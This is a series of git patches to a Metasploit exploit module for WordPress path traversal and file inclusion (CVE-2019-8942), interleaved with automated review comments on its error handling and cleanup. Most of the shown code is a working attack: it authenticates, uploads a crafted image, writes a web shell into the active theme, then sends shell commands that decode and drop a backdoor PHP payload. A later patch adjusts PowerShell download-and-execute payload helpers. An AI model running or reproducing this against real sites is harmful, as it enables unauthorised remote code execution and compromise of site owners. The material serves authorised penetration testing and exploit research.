res.code == 302 + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri1, + 'cookie' => cookie, + 'vars_get' => { + 'post_status' => "trash", + 'post_type' => 'post', + '_wpnonce' => "#{post_nonce}" + } + ) + if res && res.code == 200 && res.body && res.body.length > 0 + nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\w+)/).flatten.first + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri2, 
+ 'cookie' => cookie, + 'vars_get' => { + 'post' => "#{post_id}", + 'action' => 'delete', + '_wpnonce' => "#{nonce}" + } + ) + end + end + end + end + def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? 
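Review bot: In `wp_cleanup` (hunk `@@ -260,6 +257,81 @@`) the loop `for i in (0...6).step(2)` always runs three times, so when the single large regex does not match and `infos` is empty, three `delete-post` requests go out with an empty `id` and `_wpnonce`, and the attachments stay on the site unnoticed. Iterating over what was actually captured avoids that: `infos.each_slice(2) do |id, nonce|` with `'id' => id.to_s, '_wpnonce' => nonce.to_s` in `vars_post`. The six locals `id1`…`delete_nonce3` are never used and can be removed. The regex appears to depend on the three attachments being listed in one fixed order, which deserves a comment, and a `print_warning` when fewer than three pairs are found would tell the operator that manual cleanup is needed.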
@@ -270,134 +342,74 @@ class MetasploitModule < Msf::Exploit::Remote store_valid_credential(user: username, private: password, proof: cookie) print_status("Preparing payload...") - img_name = Rex::Text.rand_text_alpha(10) @current_theme = get_current_theme wp_nonce = get_wpnonce(cookie) + tmp_filename = "evilshell.jpg" + @current_date = Time.now.strftime("%Y/%m/") - print_status("Checking crop library") - tmp_filename = "evil.jpg" + img_name = Rex::Text.rand_text_alpha(10) @filename1, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie) ajax_nonce = get_ajaxnonce(cookie) - @current_date = Time.now.strftime("%Y/%m/") - #Check current library - use_imagick = true - crop_image(image_id, ajax_nonce, cookie) - use_imagick = check_library(@filename1, @current_date, cookie) - if use_imagick - #IMAGICK exploit - img_name = Rex::Text.rand_text_alpha(10) - @filename2, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie) - ajax_nonce = get_ajaxnonce(cookie) - @filename2 = image_editor(img_name, ajax_nonce, image_id, cookie) + @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie) + wpnonce2 = get_wpnonce2(image_id, cookie) - _wpnonce = get_wpnonce2(image_id, cookie) - change_path(_wpnonce, image_id, @filename2, @current_date, '?/x', cookie) - crop_image(image_id , ajax_nonce, cookie) - @shell_name = Rex::Text.rand_text_alpha(10) - change_path(_wpnonce, image_id, @filename2, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie) - crop_image(image_id , ajax_nonce, cookie) - print_status("Including into theme") - post_id = include_theme(@shell_name, cookie) - uri = normalize_uri(datastore['TARGETURI']) - #Test if base64 is on target - test_string = 'YmFzZTY0c3BvdHRlZAo=' - res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri, - 'cookie' => cookie, - 'vars_get' => { - 'p' => "#{post_id}", - '0' => "echo #{test_string} | base64 -d" - } - ) - if res && res.code == 200 && res.body && 
res.body.length > 0 - if res.body.include?("base64spotted") - #Execute payload with base64 decode - @backdoor = Rex::Text.rand_text_alpha(10) - encoded = Rex::Text.encode_base64(payload.encoded) + change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie) + crop_image(image_id , ajax_nonce, cookie) + + @shell_name = Rex::Text.rand_text_alpha(10) + change_path(wpnonce2, image_id, @filename1, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie) + crop_image(image_id , ajax_nonce, cookie) + + print_status("Including into theme") + post_id = include_theme(@shell_name, cookie) + uri = normalize_uri(datastore['TARGETURI']) + #Test if base64 is on target + test_string = 'YmFzZTY0c3BvdHRlZAo=' + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie, + 'vars_get' => { + 'p' => "#{post_id}", + '0' => "echo #{test_string} | base64 -d" + } + ) + if res && res.code == 200 && res.body && res.body.length > 0 + if res.body.include?("base64spotted") + #Execute payload with base64 decode + @backdoor = Rex::Text.rand_text_alpha(10) + encoded = Rex::Text.encode_base64(payload.encoded) + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie, + 'vars_get' => { + 'p' => "#{post_id}", + '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php" + } + ) + if res && res.code == 200 && res.body && res.body.length > 0 + uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php") res = send_request_cgi( 'method' => 'GET', 'uri' => uri, - 'cookie' => cookie, - 'vars_get' => { - 'p' => "#{post_id}", - '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php" - } - ) - if res && res.code == 200 && res.body && res.body.length > 0 - uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php") - res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri, - 'cookie' => cookie - ) - end - else - print_status("Can't find base64 decode on target.") - end - end - else - #GD stuff - print_status('GD 
library') - tmp_filename = "evilshell.jpg" - img_name = Rex::Text.rand_text_alpha(10) - @filename2, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie) - ajax_nonce = get_ajaxnonce(cookie) - _wpnonce = get_wpnonce2(image_id, cookie) - @shell_name = Rex::Text.rand_text_alpha(10) - change_path(_wpnonce, image_id, @filename2, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie) - crop_image(image_id , ajax_nonce, cookie) - print_status("Including into theme") - post_id = include_theme(@shell_name, cookie) - uri = normalize_uri(datastore['TARGETURI']) - #Test if base64 is on target - test_string = 'YmFzZTY0c3BvdHRlZAo=' - res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri, - 'cookie' => cookie, - 'vars_get' => { - 'p' => "#{post_id}", - '0' => "echo #{test_string} | base64 -d" - } - ) - if res && res.code == 200 && res.body && res.body.length > 0 - if res.body.include?("base64spotted") - #Execute payload with base64 decode - @backdoor = Rex::Text.rand_text_alpha(10) - encoded = Rex::Text.encode_base64(payload.encoded) - res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri, - 'cookie' => cookie, - 'vars_get' => { - 'p' => "#{post_id}", - '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php" - } - ) - if res && res.code == 200 && res.body && res.body.length > 0 - uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php") - res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri, - 'cookie' => cookie - ) - end - else - print_status("Can't find base64 decode on target.") + 'cookie' => cookie + ) end + else + print_status("Can't find base64 decode on target.") end end + wp_cleanup(@shell_name, post_id, cookie) end def on_new_session(client) - #sleep 1 client.shell_command_token("rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*") client.shell_command_token("rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*") - client.shell_command_token("rm -r 
wp-content/uploads/#{@current_date}#{@filename2[0...10]}*") + client.shell_command_token("rm -r wp-content/uploads/#{@current_date}#{@filename1[0...10]}*") client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg") - #client.shell_command_token("rm #{@backdoor}.php") + client.shell_command_token("rm #{@backdoor}.php") end end From 2ccd753ff55afec393124a5bd7c77c15a8d16f39 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 25 Mar 2019 13:58:58 -0500 Subject: [PATCH 05/16] modified scenario output for path --- .../modules/exploit/multi/http/wp_crop_rce.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/documentation/modules/exploit/multi/http/wp_crop_rce.md b/documentation/modules/exploit/multi/http/wp_crop_rce.md index 2eec8e1a26..545eabe3f4 100644 --- a/documentation/modules/exploit/multi/http/wp_crop_rce.md +++ b/documentation/modules/exploit/multi/http/wp_crop_rce.md @@ -16,7 +16,7 @@ More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/20 Confirm that functionality works: 1. Start `msfconsole` -2. `use exploit/unix/webapp/wp_crop_rce` +2. `use exploit/multi/http/wp_crop_rce` 3. Set the `RHOST` 4. Set `USERNAME` and `PASSWORD` 4. Set `LHOST` and `LPORT` 
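Review bot: After the `@filename2` → `@filename1` rename in `on_new_session` (hunk `@@ -270,134 +342,74 @@`), the first and third commands remove the same glob, `wp-content/uploads/#{@current_date}#{@filename1[0...10]}*`, once with `rm` and once with `rm -r`; the third line can be dropped. All five `rm` paths are relative, so they only hit the intended files if the session's working directory is the WordPress root, which the code does not establish; a comment stating that assumption, or building the paths from a known base, would make leftover files less likely. `wp_cleanup(@shell_name, post_id, cookie)` is reached only on the straight-line path, so an exception in any earlier step leaves the uploaded media and the post on the site; calling it from an `ensure` block in `exploit` would cover that. The start of `exploit` is outside this hunk.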
@@ -29,14 +29,14 @@ Confirm that functionality works: ### Ubuntu 18.04 running WordPress 4.9.8 ``` -msf5 > use exploit/unix/webapp/wp_crop_rce -msf5 exploit(unix/webapp/wp_crop_rce) > set rhosts 127.0.0.1 +msf5 > use exploit/multi/http/wp_crop_rce +msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(unix/webapp/wp_crop_rce) > set username author +msf5 exploit(multi/http/wp_crop_rce) > set username author username => author -msf5 exploit(unix/webapp/wp_crop_rce) > set password author +msf5 exploit(multi/http/wp_crop_rce) > set password author password => author -msf5 exploit(unix/webapp/wp_crop_rce) > run +msf5 exploit(multi/http/wp_crop_rce) > run [*] Started reverse TCP handler on 127.0.0.1:4444 [*] Authenticating with WordPress using author:author... From 59f5c291c90825426498ba870eb161d66bfa299e Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 25 Mar 2019 14:25:09 -0500 Subject: [PATCH 06/16] removed spare spaces and modified some indentation --- modules/exploits/multi/http/wp_crop_rce.rb | 201 ++++++++++----------- 1 file changed, 99 insertions(+), 102 deletions(-) diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb index 6405942862..7a638ce3b6 100644 --- a/modules/exploits/multi/http/wp_crop_rce.rb +++ b/modules/exploits/multi/http/wp_crop_rce.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'rex' - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking 
@@ -16,10 +14,10 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'WordPress Crop-image Shell Upload', 'Description' => %q{ - This module exploit a path traversal and a local file inclusion - vulnerability on WordPress versions 4.9.8 and less. - The crop-image function allow an user, with at least author privileges, - to resize an image an perform a path traversal by changing the _wp_attached_file + This module exploits a path traversal and a local file inclusion + vulnerability on WordPress versions 5.0.0 and <= 4.9.8. + The crop-image function allows a user, with at least author privileges, + to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post. @@ -45,8 +43,8 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ - OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']), - OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']) + OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']), + OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']) ]) end @@ -61,11 +59,11 @@ class MetasploitModule < Msf::Exploit::Remote end def username - datastore['USERNAME'] + datastore['USERNAME'] end def password - datastore['PASSWORD'] + datastore['PASSWORD'] end def get_wpnonce(cookie) @@ -87,9 +85,9 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => uri, 'cookie' => cookie, 'vars_get' => { - 'post' => "#{image_id}", - 'action' => "edit" - } + 'post' => "#{image_id}", + 'action' => "edit" + } ) if res && res.code == 200 && res.body && res.body.length > 0 tmp = res.get_hidden_inputs 
@@ -115,14 +113,14 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => uri, 'cookie' => cookie, 'vars_post' => { - 'action' => 'query-attachments', - 'post_id' => '0', - 'query[item]' => '43', - 'query[orderby]' => 'date', - 'query[order]' => 'DESC', - 'query[posts_per_page]' => '40', - 'query[paged]' => '1' - } + 'action' => 'query-attachments', + 'post_id' => '0', + 'query[item]' => '43', + 'query[orderby]' => 'date', + 'query[order]' => 'DESC', + 'query[posts_per_page]' => '40', + 'query[paged]' => '1' + } ) if res && res.code == 200 && res.body && res.body.length > 0 res.body.scan(/"edit":"(\w+)"/).flatten.first @@ -135,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote img_name += '.jpg' boundary = "#{rand_text_alphanumeric(rand(10) + 5)}" - post_data = "--#{boundary}\r\n" + post_data = "--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"name\"\r\n" post_data << "\r\n#{img_name}\r\n" post_data << "--#{boundary}\r\n" 
@@ -152,21 +150,21 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Uploading payload") upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php') - res = send_request_cgi( - 'method' => 'POST', - 'uri' => upload_uri, - 'ctype' => "multipart/form-data; boundary=#{boundary}", - 'data' => post_data, - 'cookie' => cookie - ) - if res && res.code == 200 && res.body && res.body.length > 0 - print_good("Image uploaded") - res = JSON.parse(res.body) - image_id = res["data"]["id"] - update_nonce = res["data"]["nonces"]["update"] - filename = res["data"]["filename"] - return filename, image_id, update_nonce - end + res = send_request_cgi( + 'method' => 'POST', + 'uri' => upload_uri, + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'cookie' => cookie + ) + if res && res.code == 200 && res.body && res.body.length > 0 + print_good("Image uploaded") + res = JSON.parse(res.body) + image_id = res["data"]["id"] + update_nonce = res["data"]["nonces"]["update"] + filename = res["data"]["filename"] + return filename, image_id, update_nonce + end end def image_editor(img_name, ajax_nonce, image_id, cookie) @@ -176,14 +174,14 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => uri, 'cookie' => cookie, 'vars_post' => { - 'action' => 'image-editor', - '_ajax_nonce' => ajax_nonce, - 'postid' => image_id, - 'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]', - 'target' => 'all', - 'context' => '', - 'do' => 'save' - } + 'action' => 'image-editor', + '_ajax_nonce' => ajax_nonce, + 'postid' => image_id, + 'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]', + 'target' => 'all', + 'context' => '', + 'do' => 'save' + } ) if res && res.code == 200 && res.body && res.body.length > 0 filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first 
@@ -194,44 +192,44 @@ class MetasploitModule < Msf::Exploit::Remote def change_path(wpnonce2, image_id, filename, current_date, path, cookie) uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') res = send_request_cgi( - 'method' => 'POST', - 'uri' => uri, - 'cookie' => cookie, - 'vars_post' => { + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { '_wpnonce' => wpnonce2, - 'action' => 'editpost', - 'post_ID' => image_id, - 'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}" - } - ) + 'action' => 'editpost', + 'post_ID' => image_id, + 'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}" + } + ) end - def crop_image(image_id , ajax_nonce, cookie) + def crop_image(image_id, ajax_nonce, cookie) uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php') res = send_request_cgi( - 'method' => 'POST', - 'uri' => uri, - 'cookie' => cookie, - 'vars_post' => { - 'action' => 'crop-image', - '_ajax_nonce' => ajax_nonce, - 'id' => image_id, - 'cropDetails[x1]' => 0, - 'cropDetails[y1]' => 0, - 'cropDetails[width]' => 400, - 'cropDetails[height]' => 300, - 'cropDetails[dst_width]' => 400, - 'cropDetails[dst_height]' => 300 - } + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + 'action' => 'crop-image', + '_ajax_nonce' => ajax_nonce, + 'id' => image_id, + 'cropDetails[x1]' => 0, + 'cropDetails[y1]' => 0, + 'cropDetails[width]' => 400, + 'cropDetails[height]' => 300, + 'cropDetails[dst_width]' => 400, + 'cropDetails[dst_height]' => 300 + } ) end def include_theme(shell_name, cookie) uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php') res = send_request_cgi( - 'method' => 'POST', - 'uri' => uri, - 'cookie' => cookie + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie ) if res && res.code == 200 && res.body && res.body.length > 0 wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first 
@@ -249,7 +247,7 @@ class MetasploitModule < Msf::Exploit::Remote 'post_title' => post_title, 'post_name' => post_title, 'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg" - } + } ) if res && res.code == 302 post_id @@ -265,7 +263,7 @@ class MetasploitModule < Msf::Exploit::Remote 'cookie' => cookie, 'vars_post' => { 'action' => "query-attachments" - } + } ) if res && res.code == 200 && res.body && res.body.length > 0 infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten @@ -273,13 +271,13 @@ class MetasploitModule < Msf::Exploit::Remote delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5] for i in (0...6).step(2) res = send_request_cgi( - 'method' => 'POST', - 'uri' => uri, - 'cookie' => cookie, - 'vars_post' => { - 'action' => "delete-post", - 'id' => "#{infos[i]}", - '_wpnonce' => "#{infos[i+1]}" + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + 'action' => "delete-post", + 'id' => "#{infos[i]}", + '_wpnonce' => "#{infos[i+1]}" } ) end 
@@ -306,25 +304,25 @@ class MetasploitModule < Msf::Exploit::Remote ) if res && res.code == 302 res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri1, - 'cookie' => cookie, - 'vars_get' => { - 'post_status' => "trash", - 'post_type' => 'post', - '_wpnonce' => "#{post_nonce}" + 'method' => 'GET', + 'uri' => uri1, + 'cookie' => cookie, + 'vars_get' => { + 'post_status' => "trash", + 'post_type' => 'post', + '_wpnonce' => "#{post_nonce}" } ) if res && res.code == 200 && res.body && res.body.length > 0 nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\w+)/).flatten.first res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri2, - 'cookie' => cookie, - 'vars_get' => { - 'post' => "#{post_id}", - 'action' => 'delete', - '_wpnonce' => "#{nonce}" + 'method' => 'GET', + 'uri' => uri2, + 'cookie' => cookie, + 'vars_get' => { + 'post' => "#{post_id}", + 'action' => 'delete', + '_wpnonce' => "#{nonce}" } ) end @@ -352,19 +350,19 @@ class MetasploitModule < Msf::Exploit::Remote ajax_nonce = get_ajaxnonce(cookie) @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie) - wpnonce2 = get_wpnonce2(image_id, cookie) + wpnonce2 = get_wpnonce2(image_id, cookie) change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie) - crop_image(image_id , ajax_nonce, cookie) + crop_image(image_id, ajax_nonce, cookie) @shell_name = Rex::Text.rand_text_alpha(10) change_path(wpnonce2, image_id, @filename1, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie) - crop_image(image_id , ajax_nonce, cookie) + crop_image(image_id, ajax_nonce, cookie) print_status("Including into theme") post_id = include_theme(@shell_name, cookie) uri = normalize_uri(datastore['TARGETURI']) - #Test if base64 is on target + # Test if base64 is on target test_string = 'YmFzZTY0c3BvdHRlZAo=' res = send_request_cgi( 'method' => 'GET', 
@@ -377,7 +375,7 @@ class MetasploitModule < Msf::Exploit::Remote ) if res && res.code == 200 && res.body && res.body.length > 0 if res.body.include?("base64spotted") - #Execute payload with base64 decode + # Execute payload with base64 decode @backdoor = Rex::Text.rand_text_alpha(10) encoded = Rex::Text.encode_base64(payload.encoded) res = send_request_cgi( @@ -395,7 +393,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => uri, 'cookie' => cookie - ) + ) end else print_status("Can't find base64 decode on target.") @@ -411,5 +409,4 @@ class MetasploitModule < Msf::Exploit::Remote client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg") client.shell_command_token("rm #{@backdoor}.php") end - end From 3a8b09f08ee26b96c03f0a3015b5c9ea0b113c32 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 25 Mar 2019 14:48:19 -0500 Subject: [PATCH 07/16] added checks on scan method --- modules/exploits/multi/http/wp_crop_rce.rb | 35 +++++++++++++++------- 1 file changed, 25 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb index 7a638ce3b6..b43d01f652 100644 --- a/modules/exploits/multi/http/wp_crop_rce.rb +++ b/modules/exploits/multi/http/wp_crop_rce.rb @@ -101,9 +101,12 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => uri ) - if res && res.code == 200 && res.body && res.body.length > 0 - res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first - end + fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && res.body.length > 0 + + theme = res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first + fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme + + theme end def get_ajaxnonce(cookie) 
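Review bot: The guard added in the `@@ -101` hunk reports every failed fetch as `Failure::NotFound`, including the case where `res` is nil because the server never answered, so the run log cannot tell an unreachable host from a page that simply lacks a theme path. Splitting the guard keeps the two apart: `fail_with(Failure::Unreachable, 'No response while retrieving theme') unless res` followed by `fail_with(Failure::UnexpectedReply, 'Unexpected response while retrieving theme') unless res.code == 200 && res.body && res.body.length > 0`. The same one-line condition is repeated in the `@@ -125` and `@@ -183` hunks of this commit, and a small private predicate would stop the three copies drifting apart. The enclosing method starts above this hunk.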
@@ -122,9 +125,11 @@ class MetasploitModule < Msf::Exploit::Remote 'query[paged]' => '1' } ) - if res && res.code == 200 && res.body && res.body.length > 0 - res.body.scan(/"edit":"(\w+)"/).flatten.first - end + fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && res.body.length > 0 + a_nonce = res.body.scan(/"edit":"(\w+)"/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce + + a_nonce end def upload_file(tmp_filename, img_name, wp_nonce, cookie) @@ -183,10 +188,11 @@ class MetasploitModule < Msf::Exploit::Remote 'do' => 'save' } ) - if res && res.code == 200 && res.body && res.body.length > 0 - filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first - filename += '.jpg' - end + fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && res.body.length > 0 + filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename + + filename << '.jpg' end def change_path(wpnonce2, image_id, filename, current_date, path, cookie) @@ -234,6 +240,8 @@ class MetasploitModule < Msf::Exploit::Remote if res && res.code == 200 && res.body && res.body.length > 0 wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id + post_title = Rex::Text.rand_text_alpha(10) uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') res = send_request_cgi( 
@@ -289,9 +297,12 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => uri1, 'cookie' => cookie ) + if res && res.code == 200 && res.body && res.body.length > 0 post_nonce = res.body.scan(/post=#{post_id}&action=trash&_wpnonce=(\w+)/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') + res = send_request_cgi( 'method' => 'GET', 'uri' => uri2, @@ -302,6 +313,7 @@ class MetasploitModule < Msf::Exploit::Remote '_wpnonce' => "#{post_nonce}" } ) + if res && res.code == 302 res = send_request_cgi( 'method' => 'GET', @@ -313,8 +325,11 @@ class MetasploitModule < Msf::Exploit::Remote '_wpnonce' => "#{post_nonce}" } ) + if res && res.code == 200 && res.body && res.body.length > 0 nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\w+)/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce + res = send_request_cgi( 'method' => 'GET', 'uri' => uri2, From d185e8a018e1c19973c6baa8d021ff5434d1f7d1 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Mon, 25 Mar 2019 14:54:46 -0500 Subject: [PATCH 08/16] indentation fix --- modules/exploits/multi/http/wp_crop_rce.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb index b43d01f652..86a3eef3db 100644 --- a/modules/exploits/multi/http/wp_crop_rce.rb +++ b/modules/exploits/multi/http/wp_crop_rce.rb 
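Review bot: Calling `fail_with` inside the cleanup path, as the `@@ -289` hunk does for a missing `post_nonce` and the `@@ -313` hunk does for `nonce`, raises out of the method and skips every remaining delete request, so whatever has not yet been removed stays on the assessed site with nothing in the log naming it. A cleanup step that cannot proceed is better reported than raised: `print_warning("Unable to retrieve post nonce; post #{post_id} must be removed manually")` followed by `return`. That gives the site owner a concrete leftover to verify and remove after the test. The enclosing method begins and ends outside these hunks.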
@@ -49,13 +49,13 @@ class MetasploitModule < Msf::Exploit::Remote end def check - cookie = wordpress_login(username, password) - if cookie.nil? - store_valid_credential(user: username, private: password, proof: cookie) - return CheckCode::Safe - end + cookie = wordpress_login(username, password) + if cookie.nil? + store_valid_credential(user: username, private: password, proof: cookie) + return CheckCode::Safe + end - CheckCode::Appears + CheckCode::Appears end def username From 496f270b307fabbb3bf06644beda8dce8e26e4e5 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 29 Mar 2019 18:14:56 -0500 Subject: [PATCH 09/16] Update use_single_quotes to wrap_double_quotes --- modules/exploits/windows/http/octopusdeploy_deploy.rb | 2 +- modules/exploits/windows/local/registry_persistence.rb | 2 +- modules/exploits/windows/local/wmi.rb | 2 +- modules/exploits/windows/smb/smb_delivery.rb | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/http/octopusdeploy_deploy.rb b/modules/exploits/windows/http/octopusdeploy_deploy.rb index 7e1c543cdf..ca0d6c87b4 100644 --- a/modules/exploits/windows/http/octopusdeploy_deploy.rb +++ b/modules/exploits/windows/http/octopusdeploy_deploy.rb @@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit # Generate the powershell payload - command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, use_single_quotes: true) + command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, wrap_double_quotes: true) step_name = datastore['STEPNAME'] || rand_text_alphanumeric(4 + rand(32 - 4)) session = create_octopus_session unless datastore['APIKEY'] diff --git a/modules/exploits/windows/local/registry_persistence.rb b/modules/exploits/windows/local/registry_persistence.rb index 6ec92d502d..bf55445944 100644 --- a/modules/exploits/windows/local/registry_persistence.rb 
+++ b/modules/exploits/windows/local/registry_persistence.rb @@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Local def generate_payload_blob opts = { - use_single_quotes: true, + wrap_double_quotes: true, encode_final_payload: true, } blob = cmd_psh_payload(payload.encoded,payload_instance.arch.first, opts).split(' ')[-1] diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb index e013678ec6..60a00bbdf3 100644 --- a/modules/exploits/windows/local/wmi.rb +++ b/modules/exploits/windows/local/wmi.rb @@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Local else psh_options = { :remove_comspec => true, :encode_inner_payload => true, - :use_single_quotes => true } + :wrap_double_quotes => true } end psh = cmd_psh_payload(payload.encoded, diff --git a/modules/exploits/windows/smb/smb_delivery.rb b/modules/exploits/windows/smb/smb_delivery.rb index a0ca2ff380..b7878c996e 100644 --- a/modules/exploits/windows/smb/smb_delivery.rb +++ b/modules/exploits/windows/smb/smb_delivery.rb @@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote self.file_contents = cmd_psh_payload( payload.encoded, payload_instance.arch.first, remove_comspec: true, - use_single_quotes: true) + wrap_double_quotes: true) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc) From 3081b13a1f66165efed194d61f61bebf2e6ea1be Mon Sep 17 00:00:00 2001 From: wilfried Date: Tue, 2 Apr 2019 10:24:48 +0200 Subject: [PATCH 10/16] Adding payload in exploit code --- data/exploits/CVE-2019-8942/evil.jpg | Bin 28541 -> 0 bytes data/exploits/CVE-2019-8942/evilshell.jpg | Bin 11820 -> 0 bytes modules/exploits/multi/http/wp_crop_rce.rb | 39 ++++++++++++++++++--- 3 files changed, 34 insertions(+), 5 deletions(-) delete mode 100644 data/exploits/CVE-2019-8942/evil.jpg delete mode 100644 data/exploits/CVE-2019-8942/evilshell.jpg 
